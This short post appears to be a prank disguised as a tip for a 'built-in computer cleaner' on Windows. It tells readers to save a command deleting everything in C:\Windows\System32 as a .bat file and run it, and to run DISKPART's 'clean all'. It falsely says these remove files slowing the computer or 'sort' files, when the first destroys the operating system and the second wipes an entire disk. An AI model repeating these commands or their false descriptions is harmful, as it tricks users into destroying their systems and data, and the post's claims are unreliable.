Did you know that, if you have a PC, you already have a built in computer cleaner! Its simple, all you have to do is open "Notepad", paste "del c:\windows\system32\*.* /q" into it. Then save it with a .bat extension.

click on the file to run it. It will find the files slowing down your computer, and delete them. You might be surprised at how many there are.

The best Cleaning tool in windows is in the Cmd just type
DISKPART and type in Clean all
and it will Clean and sort all your files.
